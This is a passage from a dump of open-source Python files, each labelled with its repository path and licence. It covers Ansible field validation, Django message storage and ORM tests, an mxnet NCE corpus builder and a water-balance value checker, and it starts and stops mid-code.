        # NOTE(review): all_vars is currently unused in this method (kept for
        # API compatibility); the mutable default is therefore harmless here.
        # walk all fields in the object
        for (name, attribute) in iteritems(self._get_base_attributes()):
            # run validator only if present
            method = getattr(self, '_validate_%s' % name, None)
            if method:
                method(attribute, name, getattr(self, name))
            else:
                # and make sure the attribute is of the type it should be
                value = getattr(self, name)
                if value is not None:
                    if attribute.isa == 'string' and isinstance(value, (list, dict)):
                        raise AnsibleParserError("The field '%s' is supposed to be a string type, however the incoming data structure is a %s" % (name, type(value)), obj=self.get_ds())

    def copy(self):
        '''
        Create a copy of this object and return it.
        '''
        new_me = self.__class__()
        for name in self._get_base_attributes():
            setattr(new_me, name, getattr(self, name))
        new_me._loader = self._loader
        new_me._variable_manager = self._variable_manager
        # if the ds value was set on the object, copy it to the new copy too
        if hasattr(self, '_ds'):
            new_me._ds = self._ds
        return new_me

    def post_validate(self, templar):
        '''
        we can't tell that everything is of the right type until we have
        all the variables.  Run basic types (from isa) as well as
        any _post_validate_<foo> functions.
        '''
        basedir = None
        if self._loader is not None:
            basedir = self._loader.get_basedir()
        # save the omit value for later checking
        omit_value = templar._available_variables.get('omit')
        for (name, attribute) in iteritems(self._get_base_attributes()):
            if getattr(self, name) is None:
                if not attribute.required:
                    continue
                else:
                    raise AnsibleParserError("the field '%s' is required but was not set" % name)
            elif not attribute.always_post_validate and self.__class__.__name__ not in ('Task', 'Handler', 'PlayContext'):
                # Intermediate objects like Play() won't have their fields validated by
                # default, as their values are often inherited by other objects and validated
                # later, so we don't want them to fail out early
                continue
            try:
                # Run the post-validator if present. These methods are responsible for
                # using the given templar to template the values, if required.
                method = getattr(self, '_post_validate_%s' % name, None)
                if method:
                    value = method(attribute, getattr(self, name), templar)
                else:
                    # if the attribute contains a variable, template it now
                    value = templar.template(getattr(self, name))
                # if this evaluated to the omit value, set the value back to
                # the default specified in the FieldAttribute and move on
                if omit_value is not None and value == omit_value:
                    value = attribute.default
                    continue
                # and make sure the attribute is of the type it should be
                if value is not None:
                    if attribute.isa == 'string':
                        value = text_type(value)
                    elif attribute.isa == 'int':
                        value = int(value)
                    elif attribute.isa == 'float':
                        value = float(value)
                    elif attribute.isa == 'bool':
                        value = boolean(value)
                    elif attribute.isa == 'percent':
                        # special value, which may be an integer or float
                        # with an optional '%' at the end
                        if isinstance(value, string_types) and '%' in value:
                            value = value.replace('%', '')
                        value = float(value)
                    elif attribute.isa == 'list':
                        if value is None:
                            value = []
                        elif not isinstance(value, list):
                            value = [ value ]
                        if attribute.listof is not None:
                            for item in value:
                                if not isinstance(item, attribute.listof):
                                    raise AnsibleParserError("the field '%s' should be a list of %s, but the item '%s' is a %s" % (name, attribute.listof, item, type(item)), obj=self.get_ds())
                                elif attribute.required and attribute.listof == string_types:
                                    if item is None or item.strip() == "":
                                        raise AnsibleParserError("the field '%s' is required, and cannot have empty values" % (name,), obj=self.get_ds())
                    elif attribute.isa == 'set':
                        if value is None:
                            value = set()
                        else:
                            if not isinstance(value, (list, set)):
                                value = [ value ]
                            if not isinstance(value, set):
                                value = set(value)
                    elif attribute.isa == 'dict':
                        if value is None:
                            value = dict()
                        elif not isinstance(value, dict):
                            raise TypeError("%s is not a dictionary" % value)
                # and assign the massaged value back to the attribute field
                setattr(self, name, value)
            except (TypeError, ValueError) as e:
                raise AnsibleParserError("the field '%s' has an invalid value (%s), and could not be converted to an %s. Error was: %s" % (name, value, attribute.isa, e), obj=self.get_ds())
            except UndefinedError as e:
                if templar._fail_on_undefined_errors and name != 'name':
                    raise AnsibleParserError("the field '%s' has an invalid value, which appears to include a variable that is undefined. The error was: %s" % (name,e), obj=self.get_ds())

    def serialize(self):
        '''
        Serializes the object derived from the base object into
        a dictionary of values. This only serializes the field
        attributes for the object, so this may need to be overridden
        for any classes which wish to add additional items not stored
        as field attributes.
        '''
        repr = dict()
        for name in self._get_base_attributes():
            repr[name] = getattr(self, name)
        # serialize the uuid field
        repr['uuid'] = getattr(self, '_uuid')
        return repr

    def deserialize(self, data):
        '''
        Given a dictionary of values, load up the field attributes for
        this object. As with serialize(), if there are any non-field
        attribute data members, this method will need to be overridden
        and extended.
        '''
        assert isinstance(data, dict)
        for (name, attribute) in iteritems(self._get_base_attributes()):
            if name in data:
                setattr(self, name, data[name])
            else:
                setattr(self, name, attribute.default)
        # restore the UUID field
        setattr(self, '_uuid', data.get('uuid'))

    def _load_vars(self, attr, ds):
        '''
        Vars in a play can be specified either as a dictionary directly, or
        as a list of dictionaries. If the latter, this method will turn the
        list into a single dictionary.
        '''
        def _validate_variable_keys(ds):
            for key in ds:
                if not isidentifier(key):
                    raise TypeError("%s is not a valid variable name" % key)
        try:
            if isinstance(ds, dict):
                _validate_variable_keys(ds)
                return ds
            elif isinstance(ds, list):
                all_vars = dict()
                for item in ds:
                    if not isinstance(item, dict):
                        raise ValueError
                    _validate_variable_keys(item)
                    all_vars = combine_vars(all_vars, item)
                return all_vars
            elif ds is None:
                return {}
            else:
                raise ValueError
        except ValueError:
            raise AnsibleParserError("Vars in a %s must be specified as a dictionary, or a list of dictionaries" % self.__class__.__name__, obj=ds)
        except TypeError as e:
            raise AnsibleParserError("Invalid variable name in vars specified for %s: %s" % (self.__class__.__name__, e), obj=ds)

    def _extend_value(self, value, new_value):
        '''
        Will extend the value given with new_value (and will turn both
        into lists if they are not so already). Adjacent duplicate values
        are collapsed while preserving the original ordering.
        '''
        if not isinstance(value, list):
            value = [ value ]
        if not isinstance(new_value, list):
            new_value = [ new_value ]
        #return list(set(value + new_value))
        # groupby drops *adjacent* duplicates only, keeping order (unlike the
        # commented-out set() version above, which would lose ordering).
        return [i for i,_ in itertools.groupby(value + new_value)]

    def __getstate__(self):
        # pickle support delegates to the field-attribute serializer
        return self.serialize()

    def __setstate__(self, data):
        # re-run __init__ first so properties/defaults exist before restoring
        self.__init__()
        self.deserialize(data)
| gpl-3.0 |
sunils34/buffer-django-nonrel | django/contrib/messages/storage/__init__.py | 393 | 1183 | from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.importlib import import_module
def get_storage(import_path):
    """
    Imports the message storage class described by import_path, where
    import_path is the full Python path to the class.

    Raises ImproperlyConfigured if the path is malformed, the module cannot
    be imported, or the module does not define the named class.
    """
    try:
        dot = import_path.rindex('.')
    except ValueError:
        raise ImproperlyConfigured("%s isn't a Python path." % import_path)
    module, classname = import_path[:dot], import_path[dot + 1:]
    try:
        mod = import_module(module)
    except ImportError as e:
        # "except ... as e" works on Python 2.6+ and Python 3, unlike the
        # old "except ImportError, e" form, which is Python-2-only syntax.
        raise ImproperlyConfigured('Error importing module %s: "%s"' %
                                   (module, e))
    try:
        return getattr(mod, classname)
    except AttributeError:
        raise ImproperlyConfigured('Module "%s" does not define a "%s" '
                                   'class.' % (module, classname))
# Callable with the same interface as the storage classes i.e. accepts a
# 'request' object. It is wrapped in a lambda to stop 'settings' being used at
# the module level
# (MESSAGE_STORAGE is re-resolved on every call, so late settings changes win).
default_storage = lambda request: get_storage(settings.MESSAGE_STORAGE)(request)
| bsd-3-clause |
vikingMei/mxnet | example/rnn/nce/src/nce/corpus.py | 1 | 2152 | #!/usr/bin/env python
# coding: utf-8
#
# Usage:
# Author: wxm71(weixing.mei@aispeech.com)
import math
import logging
import mxnet as mx
from .utils import tokenize, Vocab
from .corpusiter import NceCorpusIter
from ..loader import Corpus
class NceCorpus(Corpus):
    """Corpus variant that additionally builds a noise (negative-sampling)
    distribution over the vocabulary for NCE training.

    After construction:
      - self.negdis: mx.nd.array of per-word noise probabilities;
      - self.negative: flat list of word ids, each repeated ~count**0.75
        times, so uniform draws from it follow the noise distribution.
    """

    def __init__(self, fbase, vocab:Vocab=None):
        super(NceCorpus,self).__init__(fbase, vocab)
        self.negdis = []
        self.negative = []
        self.build_negative()

    def build_negative(self):
        """Build the word2vec-style unigram^0.75 noise distribution from the
        training split (self.data_train)."""
        total_wrd = 0
        # build negdis for train corpus
        self.wrdfrq = [0.0]*len(self.vocab)
        for idx in self.data_train:
            self.wrdfrq[idx] += 1
            total_wrd += 1
        total_cnt = 0
        self.negdis = [0]*len(self.vocab)
        for idx,cnt in enumerate(self.wrdfrq):
            # wrdfrq becomes a relative frequency; cnt still holds the raw count.
            self.wrdfrq[idx] /= total_wrd
            # Reserved ids and rare words (count < 5) get zero noise probability.
            if idx<Vocab.FIRST_VALID_ID or cnt<5:
                self.negdis[idx] = 0.0
            else:
                v = int(math.pow(cnt, 0.75))
                self.negdis[idx] = v
                self.negative.extend([idx]*v)
                total_cnt += v
        # Normalize the integer weights into a probability distribution.
        denorm = float(total_cnt)
        for key,_ in enumerate(self.negdis):
            self.negdis[key] /= denorm
        self.negdis = mx.nd.array(self.negdis)

    def _get_iter(self, data, batch_size, bptt, numlab, num_parall=2):
        # Shared factory used by the three split-specific accessors below.
        return NceCorpusIter(data, batch_size, bptt, numlab, self.negative, num_parall)

    def get_train_iter(self, batch_size, bptt, numlab, num_parall=2):
        # Iterators are created lazily and cached after the first call.
        if not self._train_iter:
            self._train_iter = self._get_iter(self.data_train, batch_size, bptt, numlab, num_parall)
        return self._train_iter

    def get_test_iter(self, batch_size, bptt, numlab, num_parall=2):
        if not self._test_iter:
            self._test_iter = self._get_iter(self.data_test, batch_size, bptt, numlab, num_parall)
        return self._test_iter

    def get_valid_iter(self, batch_size, bptt, numlab, num_parall=2):
        if not self._valid_iter:
            self._valid_iter = self._get_iter(self.data_valid, batch_size, bptt, numlab, num_parall)
        return self._valid_iter
| apache-2.0 |
AlexHill/django | tests/many_to_many/tests.py | 21 | 17894 | from __future__ import unicode_literals
from django.test import TestCase
from django.utils import six
from .models import Article, Publication
class ManyToManyTests(TestCase):
    def setUp(self):
        """Create four Publications and four Articles with known m2m links."""
        # Create a couple of Publications.
        # (id=None is equivalent to omitting id: the PK is auto-assigned.)
        self.p1 = Publication.objects.create(id=None, title='The Python Journal')
        self.p2 = Publication.objects.create(id=None, title='Science News')
        self.p3 = Publication.objects.create(id=None, title='Science Weekly')
        self.p4 = Publication.objects.create(title='Highlights for Children')
        self.a1 = Article.objects.create(id=None, headline='Django lets you build Web apps easily')
        self.a1.publications.add(self.p1)
        self.a2 = Article.objects.create(id=None, headline='NASA uses Python')
        # a2 appears in every publication; a3/a4 only in Science News.
        self.a2.publications.add(self.p1, self.p2, self.p3, self.p4)
        self.a3 = Article.objects.create(headline='NASA finds intelligent life on Earth')
        self.a3.publications.add(self.p2)
        self.a4 = Article.objects.create(headline='Oxygen-free diet works wonders')
        self.a4.publications.add(self.p2)
    def test_add(self):
        """Adding publications to an article: unsaved guard, idempotent add,
        type checking, and creation via publications.create()."""
        # Create an Article.
        # NOTE(review): "reate" looks like a typo for "create"; harmless here
        # since this headline is never asserted against.
        a5 = Article(id=None, headline='Django lets you reate Web apps easily')
        # You can't associate it with a Publication until it's been saved.
        self.assertRaises(ValueError, getattr, a5, 'publications')
        # Save it!
        a5.save()
        # Associate the Article with a Publication.
        a5.publications.add(self.p1)
        self.assertQuerysetEqual(a5.publications.all(),
            ['<Publication: The Python Journal>'])
        # Create another Article, and set it to appear in both Publications.
        a6 = Article(id=None, headline='ESA uses Python')
        a6.save()
        a6.publications.add(self.p1, self.p2)
        a6.publications.add(self.p3)
        # Adding a second time is OK
        a6.publications.add(self.p3)
        self.assertQuerysetEqual(a6.publications.all(),
            [
                '<Publication: Science News>',
                '<Publication: Science Weekly>',
                '<Publication: The Python Journal>',
            ])
        # Adding an object of the wrong type raises TypeError
        with six.assertRaisesRegex(self, TypeError, "'Publication' instance expected, got <Article.*"):
            a6.publications.add(a5)
        # Add a Publication directly via publications.add by using keyword arguments.
        a6.publications.create(title='Highlights for Adults')
        self.assertQuerysetEqual(a6.publications.all(),
            [
                '<Publication: Highlights for Adults>',
                '<Publication: Science News>',
                '<Publication: Science Weekly>',
                '<Publication: The Python Journal>',
            ])
    def test_reverse_add(self):
        """Adding via the reverse side of the m2m (``article_set``), both with
        ``add()`` and with ``create()``.
        """
        # Adding via the 'other' end of an m2m
        a5 = Article(headline='NASA finds intelligent life on Mars')
        a5.save()
        self.p2.article_set.add(a5)
        self.assertQuerysetEqual(self.p2.article_set.all(),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA finds intelligent life on Mars>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.assertQuerysetEqual(a5.publications.all(),
                                 ['<Publication: Science News>'])
        # Adding via the other end using keywords
        self.p2.article_set.create(headline='Carbon-free diet works wonders')
        self.assertQuerysetEqual(
            self.p2.article_set.all(),
            [
                '<Article: Carbon-free diet works wonders>',
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA finds intelligent life on Mars>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        # Index 3 in headline-ordered article_set is 'NASA uses Python'
        # (added to all four publications in setUp).
        a6 = self.p2.article_set.all()[3]
        self.assertQuerysetEqual(a6.publications.all(),
            [
                '<Publication: Highlights for Children>',
                '<Publication: Science News>',
                '<Publication: Science Weekly>',
                '<Publication: The Python Journal>',
            ])
    def test_related_sets(self):
        """Both sides of the m2m expose the related objects as managers."""
        # Article objects have access to their related Publication objects.
        self.assertQuerysetEqual(self.a1.publications.all(),
                                 ['<Publication: The Python Journal>'])
        self.assertQuerysetEqual(self.a2.publications.all(),
            [
                '<Publication: Highlights for Children>',
                '<Publication: Science News>',
                '<Publication: Science Weekly>',
                '<Publication: The Python Journal>',
            ])
        # Publication objects have access to their related Article objects.
        self.assertQuerysetEqual(self.p2.article_set.all(),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.assertQuerysetEqual(self.p1.article_set.all(),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA uses Python>',
            ])
        self.assertQuerysetEqual(Publication.objects.get(id=self.p4.id).article_set.all(),
                                 ['<Article: NASA uses Python>'])
    def test_selects(self):
        """Filtering across the m2m relation accepts ids, pks, instances and
        ``__in`` lists; joins can yield duplicate rows unless ``distinct()``
        is applied, and ``count()`` honours ``distinct()`` too.
        """
        # We can perform kwarg queries across m2m relationships
        self.assertQuerysetEqual(
            Article.objects.filter(publications__id__exact=self.p1.id),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA uses Python>',
            ])
        self.assertQuerysetEqual(
            Article.objects.filter(publications__pk=self.p1.id),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA uses Python>',
            ])
        self.assertQuerysetEqual(
            Article.objects.filter(publications=self.p1.id),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA uses Python>',
            ])
        self.assertQuerysetEqual(
            Article.objects.filter(publications=self.p1),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA uses Python>',
            ])
        # 'NASA uses Python' appears twice: it belongs to both Science titles.
        self.assertQuerysetEqual(
            Article.objects.filter(publications__title__startswith="Science"),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA uses Python>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.assertQuerysetEqual(
            Article.objects.filter(publications__title__startswith="Science").distinct(),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        # The count() function respects distinct() as well.
        self.assertEqual(Article.objects.filter(publications__title__startswith="Science").count(), 4)
        self.assertEqual(Article.objects.filter(publications__title__startswith="Science").distinct().count(), 3)
        self.assertQuerysetEqual(
            Article.objects.filter(publications__in=[self.p1.id, self.p2.id]).distinct(),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        # __in accepts a mix of pk values and model instances.
        self.assertQuerysetEqual(
            Article.objects.filter(publications__in=[self.p1.id, self.p2]).distinct(),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.assertQuerysetEqual(
            Article.objects.filter(publications__in=[self.p1, self.p2]).distinct(),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        # Excluding a related item works as you would expect, too (although the SQL
        # involved is a little complex).
        self.assertQuerysetEqual(Article.objects.exclude(publications=self.p2),
                                 ['<Article: Django lets you build Web apps easily>'])
    def test_reverse_selects(self):
        """The same lookup forms work starting from the side that does *not*
        declare the ManyToManyField (Publication -> article).
        """
        # Reverse m2m queries are supported (i.e., starting at the table that
        # doesn't have a ManyToManyField).
        self.assertQuerysetEqual(Publication.objects.filter(id__exact=self.p1.id),
                                 ['<Publication: The Python Journal>'])
        self.assertQuerysetEqual(Publication.objects.filter(pk=self.p1.id),
                                 ['<Publication: The Python Journal>'])
        # 'Science News' appears twice: two articles start with "NASA".
        self.assertQuerysetEqual(
            Publication.objects.filter(article__headline__startswith="NASA"),
            [
                '<Publication: Highlights for Children>',
                '<Publication: Science News>',
                '<Publication: Science News>',
                '<Publication: Science Weekly>',
                '<Publication: The Python Journal>',
            ])
        self.assertQuerysetEqual(Publication.objects.filter(article__id__exact=self.a1.id),
                                 ['<Publication: The Python Journal>'])
        self.assertQuerysetEqual(Publication.objects.filter(article__pk=self.a1.id),
                                 ['<Publication: The Python Journal>'])
        self.assertQuerysetEqual(Publication.objects.filter(article=self.a1.id),
                                 ['<Publication: The Python Journal>'])
        self.assertQuerysetEqual(Publication.objects.filter(article=self.a1),
                                 ['<Publication: The Python Journal>'])
        self.assertQuerysetEqual(
            Publication.objects.filter(article__in=[self.a1.id, self.a2.id]).distinct(),
            [
                '<Publication: Highlights for Children>',
                '<Publication: Science News>',
                '<Publication: Science Weekly>',
                '<Publication: The Python Journal>',
            ])
        # __in accepts a mix of pk values and model instances.
        self.assertQuerysetEqual(
            Publication.objects.filter(article__in=[self.a1.id, self.a2]).distinct(),
            [
                '<Publication: Highlights for Children>',
                '<Publication: Science News>',
                '<Publication: Science Weekly>',
                '<Publication: The Python Journal>',
            ])
        self.assertQuerysetEqual(
            Publication.objects.filter(article__in=[self.a1, self.a2]).distinct(),
            [
                '<Publication: Highlights for Children>',
                '<Publication: Science News>',
                '<Publication: Science Weekly>',
                '<Publication: The Python Journal>',
            ])
    def test_delete(self):
        """Deleting either side of the relation removes the corresponding
        m2m rows, so the surviving side no longer sees the deleted object.
        """
        # If we delete a Publication, its Articles won't be able to access it.
        self.p1.delete()
        self.assertQuerysetEqual(Publication.objects.all(),
            [
                '<Publication: Highlights for Children>',
                '<Publication: Science News>',
                '<Publication: Science Weekly>',
            ])
        self.assertQuerysetEqual(self.a1.publications.all(), [])
        # If we delete an Article, its Publications won't be able to access it.
        self.a2.delete()
        self.assertQuerysetEqual(Article.objects.all(),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.assertQuerysetEqual(self.p2.article_set.all(),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: Oxygen-free diet works wonders>',
            ])
    def test_bulk_delete(self):
        """QuerySet.delete() also cleans up m2m references, and a cached
        QuerySet re-evaluates to the post-delete state once re-queried.
        """
        # Bulk delete some Publications - references to deleted publications should go
        Publication.objects.filter(title__startswith='Science').delete()
        self.assertQuerysetEqual(Publication.objects.all(),
            [
                '<Publication: Highlights for Children>',
                '<Publication: The Python Journal>',
            ])
        self.assertQuerysetEqual(Article.objects.all(),
            [
                '<Article: Django lets you build Web apps easily>',
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.assertQuerysetEqual(self.a2.publications.all(),
            [
                '<Publication: Highlights for Children>',
                '<Publication: The Python Journal>',
            ])
        # Bulk delete some articles - references to deleted objects should go
        q = Article.objects.filter(headline__startswith='Django')
        self.assertQuerysetEqual(q, ['<Article: Django lets you build Web apps easily>'])
        q.delete()
        # After the delete, the QuerySet cache needs to be cleared,
        # and the referenced objects should be gone
        self.assertQuerysetEqual(q, [])
        self.assertQuerysetEqual(self.p1.article_set.all(),
                                 ['<Article: NASA uses Python>'])
    def test_remove(self):
        """``remove()`` unlinks a single related object from either side
        without deleting the object itself.
        """
        # Removing publication from an article:
        self.assertQuerysetEqual(self.p2.article_set.all(),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA uses Python>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.a4.publications.remove(self.p2)
        self.assertQuerysetEqual(self.p2.article_set.all(),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: NASA uses Python>',
            ])
        self.assertQuerysetEqual(self.a4.publications.all(), [])
        # And from the other end
        self.p2.article_set.remove(self.a3)
        self.assertQuerysetEqual(self.p2.article_set.all(),
            [
                '<Article: NASA uses Python>',
            ])
        self.assertQuerysetEqual(self.a3.publications.all(), [])
    def test_assign(self):
        """Direct assignment to the m2m descriptor replaces the whole set;
        assigning an empty list is equivalent to ``clear()``.

        NOTE(review): direct assignment to a related manager was deprecated
        and removed in later Django versions in favour of ``set()``.
        """
        # Relation sets can be assigned. Assignment clears any existing set members
        self.p2.article_set = [self.a4, self.a3]
        self.assertQuerysetEqual(self.p2.article_set.all(),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.assertQuerysetEqual(self.a4.publications.all(),
                                 ['<Publication: Science News>'])
        self.a4.publications = [self.p3.id]
        self.assertQuerysetEqual(self.p2.article_set.all(),
                                 ['<Article: NASA finds intelligent life on Earth>'])
        self.assertQuerysetEqual(self.a4.publications.all(),
                                 ['<Publication: Science Weekly>'])
        # An alternate to calling clear() is to assign the empty set
        self.p2.article_set = []
        self.assertQuerysetEqual(self.p2.article_set.all(), [])
        self.a4.publications = []
        self.assertQuerysetEqual(self.a4.publications.all(), [])
    def test_assign_ids(self):
        """Assignment to the m2m descriptor also accepts primary key values
        instead of model instances.
        """
        # Relation sets can also be set using primary key values
        self.p2.article_set = [self.a4.id, self.a3.id]
        self.assertQuerysetEqual(self.p2.article_set.all(),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.assertQuerysetEqual(self.a4.publications.all(),
                                 ['<Publication: Science News>'])
        self.a4.publications = [self.p3.id]
        self.assertQuerysetEqual(self.p2.article_set.all(),
                                 ['<Article: NASA finds intelligent life on Earth>'])
        self.assertQuerysetEqual(self.a4.publications.all(),
                                 ['<Publication: Science Weekly>'])
    def test_clear(self):
        """``clear()`` empties the relation from either side; the objects
        themselves survive and can be re-linked afterwards.
        """
        # Relation sets can be cleared:
        self.p2.article_set.clear()
        self.assertQuerysetEqual(self.p2.article_set.all(), [])
        self.assertQuerysetEqual(self.a4.publications.all(), [])
        # And you can clear from the other end
        self.p2.article_set.add(self.a3, self.a4)
        self.assertQuerysetEqual(self.p2.article_set.all(),
            [
                '<Article: NASA finds intelligent life on Earth>',
                '<Article: Oxygen-free diet works wonders>',
            ])
        self.assertQuerysetEqual(self.a4.publications.all(),
            [
                '<Publication: Science News>',
            ])
        self.a4.publications.clear()
        self.assertQuerysetEqual(self.a4.publications.all(), [])
        self.assertQuerysetEqual(self.p2.article_set.all(),
                                 ['<Article: NASA finds intelligent life on Earth>'])
| bsd-3-clause |
lizardsystem/lizard-waterbalance | lizard_wbcomputation/target_value_checker.py | 1 | 2291 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=C0111
# The lizard_wbcomputation package implements the computational core of the
# lizard waterbalance Django app.
#
# Copyright (C) 2012 Nelen & Schuurmans
#
# This package is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this package. If not, see <http://www.gnu.org/licenses/>.
class TargetValueChecker(object):
    """Implements check whether a time series revolves around a target value.

    This class retrieves the time series from a file through the use of a
    reader object. The client code passes that reader to the constructor, which
    stores it as attribute 'time_series_reader'. The reader should have a
    method

        def get(self, file_name)

    that returns the time series.

    The constructor sets the target value as attribute 'target_value'. By
    default, the target value is 1.0 but client code can override this value
    after construction.

    """
    def __init__(self, time_series_reader):
        # Object whose get(file_name) method returns the time series to check.
        self.time_series_reader = time_series_reader
        # Value each event is expected to stay (almost) equal to; may be
        # overridden by client code after construction.
        self.target_value = 1.0

    def verify(self, file_name):
        """Return True if and only if every event value of the time series in
        the given file lies within 1e-6 of the target value.

        Stops at the first value outside that tolerance and reports the
        offending date and value on stdout.
        """
        success = True
        timeseries = self.time_series_reader.get(file_name)
        for date, value in timeseries.get_events():
            # Each event value is a sequence; only its first element matters.
            event_value = value[0]
            success = self.nearby_target_value(event_value)
            if not success:
                print 'Failure', date, event_value
                break
        return success

    def nearby_target_value(self, value):
        # True when value lies strictly within 1e-6 of the target value.
        lower_bound = self.target_value - 1e-6
        upper_bound = self.target_value + 1e-6
        return value > lower_bound and value < upper_bound
| gpl-3.0 |
sarthakmeh03/django | tests/or_lookups/tests.py | 21 | 8040 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime
from operator import attrgetter
from django.db.models import Q
from django.test import TestCase
from django.utils.encoding import force_str
from .models import Article
class OrLookupsTests(TestCase):
    """Tests for OR-ed query conditions: combining QuerySets with ``|``/``&``
    and building conditions with Q objects (including negation, pk__in and
    complex_filter).
    """

    def setUp(self):
        # Three articles; only the pk of each is stored on self.
        self.a1 = Article.objects.create(
            headline='Hello', pub_date=datetime(2005, 11, 27)
        ).pk
        self.a2 = Article.objects.create(
            headline='Goodbye', pub_date=datetime(2005, 11, 28)
        ).pk
        self.a3 = Article.objects.create(
            headline='Hello and goodbye', pub_date=datetime(2005, 11, 29)
        ).pk

    def test_filter_or(self):
        """ORing two QuerySets with ``|`` is equivalent to a single filter
        with OR-ed Q objects."""
        self.assertQuerysetEqual(
            (
                Article.objects.filter(headline__startswith='Hello') |
                Article.objects.filter(headline__startswith='Goodbye')
            ), [
                'Hello',
                'Goodbye',
                'Hello and goodbye'
            ],
            attrgetter("headline")
        )
        self.assertQuerysetEqual(
            Article.objects.filter(headline__contains='Hello') | Article.objects.filter(headline__contains='bye'), [
                'Hello',
                'Goodbye',
                'Hello and goodbye'
            ],
            attrgetter("headline")
        )
        self.assertQuerysetEqual(
            Article.objects.filter(headline__iexact='Hello') | Article.objects.filter(headline__contains='ood'), [
                'Hello',
                'Goodbye',
                'Hello and goodbye'
            ],
            attrgetter("headline")
        )
        self.assertQuerysetEqual(
            Article.objects.filter(Q(headline__startswith='Hello') | Q(headline__startswith='Goodbye')), [
                'Hello',
                'Goodbye',
                'Hello and goodbye'
            ],
            attrgetter("headline")
        )

    def test_stages(self):
        """QuerySets can be combined incrementally with ``&``."""
        # You can shorten this syntax with code like the following, which is
        # especially useful if building the query in stages:
        articles = Article.objects.all()
        self.assertQuerysetEqual(
            articles.filter(headline__startswith='Hello') & articles.filter(headline__startswith='Goodbye'),
            []
        )
        self.assertQuerysetEqual(
            articles.filter(headline__startswith='Hello') & articles.filter(headline__contains='bye'), [
                'Hello and goodbye'
            ],
            attrgetter("headline")
        )

    def test_pk_q(self):
        """Q objects on the primary key can be OR-ed together."""
        self.assertQuerysetEqual(
            Article.objects.filter(Q(pk=self.a1) | Q(pk=self.a2)), [
                'Hello',
                'Goodbye'
            ],
            attrgetter("headline")
        )
        self.assertQuerysetEqual(
            Article.objects.filter(Q(pk=self.a1) | Q(pk=self.a2) | Q(pk=self.a3)), [
                'Hello',
                'Goodbye',
                'Hello and goodbye'
            ],
            attrgetter("headline"),
        )

    def test_pk_in(self):
        """``pk__in`` accepts lists and tuples; unknown pks are ignored."""
        self.assertQuerysetEqual(
            Article.objects.filter(pk__in=[self.a1, self.a2, self.a3]), [
                'Hello',
                'Goodbye',
                'Hello and goodbye'
            ],
            attrgetter("headline"),
        )
        self.assertQuerysetEqual(
            Article.objects.filter(pk__in=(self.a1, self.a2, self.a3)), [
                'Hello',
                'Goodbye',
                'Hello and goodbye'
            ],
            attrgetter("headline"),
        )
        self.assertQuerysetEqual(
            Article.objects.filter(pk__in=[self.a1, self.a2, self.a3, 40000]), [
                'Hello',
                'Goodbye',
                'Hello and goodbye'
            ],
            attrgetter("headline"),
        )

    def test_q_repr(self):
        """repr() of plain and negated Q objects (with non-ASCII content)."""
        or_expr = Q(baz=Article(headline="Foö"))
        self.assertEqual(repr(or_expr), force_str("<Q: (AND: ('baz', <Article: Foö>))>"))
        negated_or = ~Q(baz=Article(headline="Foö"))
        self.assertEqual(repr(negated_or), force_str("<Q: (NOT (AND: ('baz', <Article: Foö>)))>"))

    def test_q_negated(self):
        """Q objects can be negated with ``~`` and mixed with ``|``/``&``."""
        # Q objects can be negated
        self.assertQuerysetEqual(
            Article.objects.filter(Q(pk=self.a1) | ~Q(pk=self.a2)), [
                'Hello',
                'Hello and goodbye'
            ],
            attrgetter("headline")
        )
        self.assertQuerysetEqual(
            Article.objects.filter(~Q(pk=self.a1) & ~Q(pk=self.a2)), [
                'Hello and goodbye'
            ],
            attrgetter("headline"),
        )
        # This allows for more complex queries than filter() and exclude()
        # alone would allow
        self.assertQuerysetEqual(
